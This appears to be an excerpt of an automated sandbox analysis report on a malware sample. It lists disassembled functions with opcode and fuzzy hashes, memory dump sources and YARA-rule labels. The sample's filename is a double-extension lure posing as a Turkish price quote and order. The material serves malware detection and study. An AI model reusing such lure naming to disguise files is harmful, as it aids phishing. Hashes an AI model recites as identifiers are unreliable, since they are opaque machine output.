                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'q$4'q
                                                                                                      • API String ID: 0-1467158625
                                                                                                      • Opcode ID: 6182fbe65b37ea32351b2525ae9c0cd8e406df51fbb91d0071f0fd35726c4461
                                                                                                      • Instruction ID: 36bc486bc8985d1ccddb311009fac9186746122fa59687bcb759c43f1c80dccd
                                                                                                      • Opcode Fuzzy Hash: 6182fbe65b37ea32351b2525ae9c0cd8e406df51fbb91d0071f0fd35726c4461
                                                                                                      • Instruction Fuzzy Hash: C151A0707003469FDB008B69C894B6BBBEAEF89324F448466E948CB255DF71DD12CB61
                                                                                                      Function 02A13CB1 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Xq$Xq
                                                                                                      • API String ID: 0-1556399337
                                                                                                      • Opcode ID: d697dbde2c297b05004b5d949e4064ab9beb4f91fd4d89f3b6822e2df725e01e
                                                                                                      • Instruction ID: f2edb65d06adb92385edb9315f0c6f9c16767d280a93d22d238cae3df8282617
                                                                                                      • Opcode Fuzzy Hash: d697dbde2c297b05004b5d949e4064ab9beb4f91fd4d89f3b6822e2df725e01e
                                                                                                      • Instruction Fuzzy Hash: 6A31C531B043658BEF284B7A49D537EA6AAAFC5224F1848BDE806C7381DF75CC458691
                                                                                                      Function 02A10C8F Relevance: 1.8, Strings: 1, Instructions: 545COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LRq
                                                                                                      • API String ID: 0-3187445251
                                                                                                      • Opcode ID: f011ad64ea6bbd3bc049ab9ada334656cd990b7b1971bec84baaa86a2a8922be
                                                                                                      • Instruction ID: b2c00d1a2a2b28514fca56ad7b049a8e063fccb9da94786c94696f41ffbad46b
                                                                                                      • Opcode Fuzzy Hash: f011ad64ea6bbd3bc049ab9ada334656cd990b7b1971bec84baaa86a2a8922be
                                                                                                      • Instruction Fuzzy Hash: 2352B678910259CFCB54EF64ED94B9DBBB2FB49305F1085A9D409AB358DB306E82DF80
                                                                                                      Function 02A10CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LRq
                                                                                                      • API String ID: 0-3187445251
                                                                                                      • Opcode ID: 6d2a3a787d01cc0ed96c1066b506f0e8b3079b438bb1ecc654f707dad1414b7a
                                                                                                      • Instruction ID: 337c8dfca94d28ba701cea2424ff6ff843efb8c1949957d0c342c20f721b62b9
                                                                                                      • Opcode Fuzzy Hash: 6d2a3a787d01cc0ed96c1066b506f0e8b3079b438bb1ecc654f707dad1414b7a
                                                                                                      • Instruction Fuzzy Hash: 1852B678910259CFCB54EF64ED94B9DBBB2FB49305F1085A9D409AB358DB306E82DF80
                                                                                                      Function 051BC708 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 051BC86A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 6842923-0
                                                                                                      • Opcode ID: 0bfcfced9b9da62f4a949393c6831fe21602c2147909afc56b6dba221965c10c
                                                                                                      • Instruction ID: 1316745d3e588c80dc16bf72b980f2c1b9ba92804843ca7d3e02c256b650c847
                                                                                                      • Opcode Fuzzy Hash: 0bfcfced9b9da62f4a949393c6831fe21602c2147909afc56b6dba221965c10c
                                                                                                      • Instruction Fuzzy Hash: E951F474D01219DFEB18DFAAD4886DDBBB2BF88314F10C12AE415BB298DB749945CF90
                                                                                                      Function 051BC8A3 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 29d63e1db2908915e447a83857d0a7ee79651a6025b17eb99ed778e27dd492f7
                                                                                                      • Instruction ID: ecb4b5163175e05868f144340ebe58e4c39f1fe7688fd1d4c3a9ef45e23b13af
                                                                                                      • Opcode Fuzzy Hash: 29d63e1db2908915e447a83857d0a7ee79651a6025b17eb99ed778e27dd492f7
                                                                                                      • Instruction Fuzzy Hash: 82510374D05209CFEB14CFA9D488AECBBB2FF49319F20912AE415BB294D7749885CF94
                                                                                                      Function 051B992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 051B9A6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 0c26b39fe0727c37515363dd467f09a0b5473c9c6fbc58814753f4355948144a
                                                                                                      • Instruction ID: 29e8ba033d071422862345010c4f7ea2e0b568da0564a8456fde7c9058d953c7
                                                                                                      • Opcode Fuzzy Hash: 0c26b39fe0727c37515363dd467f09a0b5473c9c6fbc58814753f4355948144a
                                                                                                      • Instruction Fuzzy Hash: EC117FB4E002099FEB08DFA8D584EEDBBB9FF98314F148155E904AB245D7B09942CF50
                                                                                                      Function 02A1E007 Relevance: .7, Instructions: 654COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 28e800f6e7aa355c742d6fe5c17b2abd5876410283b660eebf8b4aef2f207c7a
                                                                                                      • Instruction ID: c42bde5a2b12471b62fcd6b7ac191b4a900d9cbadd157ce507708c3b94fc415c
                                                                                                      • Opcode Fuzzy Hash: 28e800f6e7aa355c742d6fe5c17b2abd5876410283b660eebf8b4aef2f207c7a
                                                                                                      • Instruction Fuzzy Hash: 5812BE348A1346DFD640AF76E6EC12ABB64FB4F717714AC02E20FC48569F35846ACE52
                                                                                                      Function 02A1E018 Relevance: .6, Instructions: 647COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1b773ee696456e729193a079c781213aceaed025b7cbad254a0b6da05c8af599
                                                                                                      • Instruction ID: f9712eb3abeb3cf9218a142bed256d2a3558e06b1c06b2602b40a2730b169777
                                                                                                      • Opcode Fuzzy Hash: 1b773ee696456e729193a079c781213aceaed025b7cbad254a0b6da05c8af599
                                                                                                      • Instruction Fuzzy Hash: E612BE348A1346DFD640AF76E6EC12ABB64FB5F717714AC02E20FC48569F31846ACE52
                                                                                                      Function 05779841 Relevance: .2, Instructions: 237COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 98eae983fdb5f12d6354ecf0ee448f5d8d40bc1a64140403af777fd3beb7a87d
                                                                                                      • Instruction ID: a2654abfb248918ee40973d1011e91e83e1e5805058a840463fe2002d0370bcf
                                                                                                      • Opcode Fuzzy Hash: 98eae983fdb5f12d6354ecf0ee448f5d8d40bc1a64140403af777fd3beb7a87d
                                                                                                      • Instruction Fuzzy Hash: EEC1DE70A002298FEB64DF64D945BDDBBB2BB88300F1081EAE60DA7390DB345E84DF51
                                                                                                      Function 05779850 Relevance: .2, Instructions: 232COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 85ee37e6a1d1e8fd7fe0220b0c2013e0084f733eaaf67f4553ceb1a388d5725d
                                                                                                      • Instruction ID: 453e2a317c8f03995b378c9b9da311092bec20c8117779903b32fd958fd22e84
                                                                                                      • Opcode Fuzzy Hash: 85ee37e6a1d1e8fd7fe0220b0c2013e0084f733eaaf67f4553ceb1a388d5725d
                                                                                                      • Instruction Fuzzy Hash: 61B1CE70A002298FEB64DF65D945BDDBBB2BB88300F1081EAE60DA7390DB345E84DF51
                                                                                                      Function 02A180D8 Relevance: .2, Instructions: 201COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e0bdff10b24828996d8fb4e09ddd369f44d4f3f8db869a1d548a402a87c2094f
                                                                                                      • Instruction ID: 74f78b39ed1596e2881c8a2bdce4a095bc801d99715b767aeaa24c3f41070732
                                                                                                      • Opcode Fuzzy Hash: e0bdff10b24828996d8fb4e09ddd369f44d4f3f8db869a1d548a402a87c2094f
                                                                                                      • Instruction Fuzzy Hash: F8714B347406058FEB19DF69C888AAEBBF6AF49324B1505A9E815DB370DF78DC41CB50
                                                                                                      Function 057794F0 Relevance: .2, Instructions: 174COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 050584a3d9dd5cfd4877141561f4147e12e196277b176da4ad6a3fa8268b5cd4
                                                                                                      • Instruction ID: 059980b2d8b56c8c04c41b277c2e66d71fe67c47348079cb22e82b71c3ae3ce1
                                                                                                      • Opcode Fuzzy Hash: 050584a3d9dd5cfd4877141561f4147e12e196277b176da4ad6a3fa8268b5cd4
                                                                                                      • Instruction Fuzzy Hash: 4661F474E012089FDF08DFA9E954BADBBF2BF98310F14C169E908BB354DA31A9419F54
                                                                                                      Function 02A1F739 Relevance: .2, Instructions: 152COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3d479095712780f22a732064c60c576f91fdcf34f8f6fd41ae2d863c3808865e
                                                                                                      • Instruction ID: 454bc3839d0b308af109e927e94d8ae8c9f66c8b551b1b6f700521d38c4043d7
                                                                                                      • Opcode Fuzzy Hash: 3d479095712780f22a732064c60c576f91fdcf34f8f6fd41ae2d863c3808865e
                                                                                                      • Instruction Fuzzy Hash: FF61D034D01318DFDB15DFA5D898BADBBB2FF89310F208129E805AB299DB755A46CF40
                                                                                                      Function 0577A060 Relevance: .1, Instructions: 149COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3db5c9a79fe9c5d8ee5da1dbb37a68a17ccbfda8b90b18203cb12284ae9a3460
                                                                                                      • Instruction ID: 52c45345a626a0371db6319d3105ae8fed674c38491fb5fe1d03b3b6f693c8d6
                                                                                                      • Opcode Fuzzy Hash: 3db5c9a79fe9c5d8ee5da1dbb37a68a17ccbfda8b90b18203cb12284ae9a3460
                                                                                                      • Instruction Fuzzy Hash: 4961A074E002189FDF14DFA9D895AEEBBB2FF88300F14802AE915AB354DB355946DF90
                                                                                                      Function 0577A070 Relevance: .1, Instructions: 143COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1e4dd3f97d8c7c6d3da3ccc8b3a1e6dd32fbde228853c93ee111fbb9224555d2
                                                                                                      • Instruction ID: 2fe150c67a635a0d118f1a4c36537fb2b7c5bc5a2e40b6e78b49316ecb3c1e3c
                                                                                                      • Opcode Fuzzy Hash: 1e4dd3f97d8c7c6d3da3ccc8b3a1e6dd32fbde228853c93ee111fbb9224555d2
                                                                                                      • Instruction Fuzzy Hash: 02519F74E002189FDF04DFA9D895AEEBBB2FF88300F14802AE915AB354DB355946DF90
                                                                                                      Function 02A1D548 Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7d60eb16e4d65bdd793c1ba954d0ede04601b8dde5dbdbc3cfe6fc9ead065ebf
                                                                                                      • Instruction ID: 1202e97dcb5f8a15106a874cf14878b2bd629a4eb939f3bbfa1cd0929c5655a5
                                                                                                      • Opcode Fuzzy Hash: 7d60eb16e4d65bdd793c1ba954d0ede04601b8dde5dbdbc3cfe6fc9ead065ebf
                                                                                                      • Instruction Fuzzy Hash: DA51A574E01208DFDB54DFA9D98499DBBF2FF89310F248169E919AB365DB30A901CF50
                                                                                                      Function 05779CD7 Relevance: .1, Instructions: 137COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5f1bd175e20dbb16e930cb29d15bcb47bae1e9b0909b0a552e410706ed48f38
                                                                                                      • Instruction ID: fcc73877884ba0bdcd80b9d8924329e7e8757421d971bb40580afd7a1780b162
                                                                                                      • Opcode Fuzzy Hash: f5f1bd175e20dbb16e930cb29d15bcb47bae1e9b0909b0a552e410706ed48f38
                                                                                                      • Instruction Fuzzy Hash: EB51B074E002199FDB04DFA9D595BEEBBF2FF88300F24802AE505AB354D734AA45CB90
                                                                                                      Function 02A141A0 Relevance: .1, Instructions: 134COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 13992fdcad452e6bbd0c22d99aa1ea3ed196dc62191915363db2b2a8b9d03db3
                                                                                                      • Instruction ID: b296c9cdaac878c2c1e658740173ade4d9ddb80f9a1b8e358583892ff9329fc2
                                                                                                      • Opcode Fuzzy Hash: 13992fdcad452e6bbd0c22d99aa1ea3ed196dc62191915363db2b2a8b9d03db3
                                                                                                      • Instruction Fuzzy Hash: 21517078E01208CFDB08DFA9D59499DBBF2FF89310B209469E815AB364DB31AC46DF50
                                                                                                      Function 05779CE8 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5a9304376b9842eed1510a3c8128368009b3ded1dc9ceb24c35efc7fc4309a5a
                                                                                                      • Instruction ID: 39e3069c5c9474b0187768f91bf83fd455f3edb7278c86ccc07f2fd0e27f7610
                                                                                                      • Opcode Fuzzy Hash: 5a9304376b9842eed1510a3c8128368009b3ded1dc9ceb24c35efc7fc4309a5a
                                                                                                      • Instruction Fuzzy Hash: 8851B174E012199FDB04DFA9D595AEEBBF2FF88300F24802AD515AB354DB346A45CB90
                                                                                                      Function 02A1A303 Relevance: .1, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e14cac1ce17cfd922638a533eb2867fba6a7533d2da3ea6d801444066162eda4
                                                                                                      • Instruction ID: 1a410c3a567358fbaa4bc01784c026c24bc8d120b90c61b12434af15449d3e8e
                                                                                                      • Opcode Fuzzy Hash: e14cac1ce17cfd922638a533eb2867fba6a7533d2da3ea6d801444066162eda4
                                                                                                      • Instruction Fuzzy Hash: AD410835A01249DFCF11CFA4D885B9DBFB2FF49324F048495E8499B266DB30E915CB60
                                                                                                      Function 05778A59 Relevance: .1, Instructions: 119COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f1e34c3bac193c75b98885f79392fbea66ca1c6959ba03195c9d6f72a56923a9
                                                                                                      • Instruction ID: 6626d87a7c7fabcf4359bf74d98679d1da64cf2ffb9af2d7dae9b2c1e3febccb
                                                                                                      • Opcode Fuzzy Hash: f1e34c3bac193c75b98885f79392fbea66ca1c6959ba03195c9d6f72a56923a9
                                                                                                      • Instruction Fuzzy Hash: E6415071E0021D9BDF14DFA5D884AEEBBF5BF88710F28812AE401B7240DB70A946CB91
                                                                                                      Function 02A15658 Relevance: .1, Instructions: 101COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3b711df1296f669934652a6849ee077c6859dc0c2c92abc05defb4c8ee7e5161
                                                                                                      • Instruction ID: 7a7e184c5894122fffa8062c35c8dfb160bccfbc5e35dd7999668e1207588fdb
                                                                                                      • Opcode Fuzzy Hash: 3b711df1296f669934652a6849ee077c6859dc0c2c92abc05defb4c8ee7e5161
                                                                                                      • Instruction Fuzzy Hash: 9831AE31A05109DFCF05AF65E884AAF3BA2EF89315F044829F91587384CF39CD62DBA1
                                                                                                      Function 02A18370 Relevance: .1, Instructions: 88COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 00b19f0882ad418722ae5f838c02c950746a863e2da73458c6107edbdd3f881d
                                                                                                      • Instruction ID: 5af0573464451c00493ddd15297ed72fce13c427af047bac44a09696b1038e70
                                                                                                      • Opcode Fuzzy Hash: 00b19f0882ad418722ae5f838c02c950746a863e2da73458c6107edbdd3f881d
                                                                                                      • Instruction Fuzzy Hash: 0721F5343042004FEB25577A889673E76A7AFC5729708806AE846CB7A5EF2DCC02D381
                                                                                                      Function 02A18380 Relevance: .1, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ec2be3198744b2c3c5fe329c8349ca32dc5f0c29f8321c6307224d68cca5b8e
                                                                                                      • Instruction ID: 852d48230de373ba67ef33d4906d6095123601fcb2a2a699230a733fb135df6a
                                                                                                      • Opcode Fuzzy Hash: 4ec2be3198744b2c3c5fe329c8349ca32dc5f0c29f8321c6307224d68cca5b8e
                                                                                                      • Instruction Fuzzy Hash: 7921BB347002004FFB24976A889677E769BAFC9768F188039E442CB799EF6DCC42D381
                                                                                                      Function 02A162F0 Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2e86052f88e0b10bc3ddff74cb76cd3397cf4a871103684d1907002f672e8b07
                                                                                                      • Instruction ID: 72a31d1184aad6c16db870185a48e773a99ef62f94bfbd1de263026d284db571
                                                                                                      • Opcode Fuzzy Hash: 2e86052f88e0b10bc3ddff74cb76cd3397cf4a871103684d1907002f672e8b07
                                                                                                      • Instruction Fuzzy Hash: 1B2104357056208FC7159B2AD49463EB7A7FFCAB6570844AAE816DB798CF34CC02CB90
                                                                                                      Function 02A128F0 Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a0f7143c3c1ddf3bf3a199fc59081c903823634781d95424884c0ba96613ed86
                                                                                                      • Instruction ID: dc4d370e4885a3a2e501f36bc5e72e7b42fe9e1c1683f76e4743a0076d07330d
                                                                                                      • Opcode Fuzzy Hash: a0f7143c3c1ddf3bf3a199fc59081c903823634781d95424884c0ba96613ed86
                                                                                                      • Instruction Fuzzy Hash: C3218335A002249FCB14DF2CC880BAE7BB5EB99360B508559D9199B348DF31EE42CBD0
                                                                                                      Function 057788C6 Relevance: .1, Instructions: 74COMMON
                                                                                                      Download Yara Rule
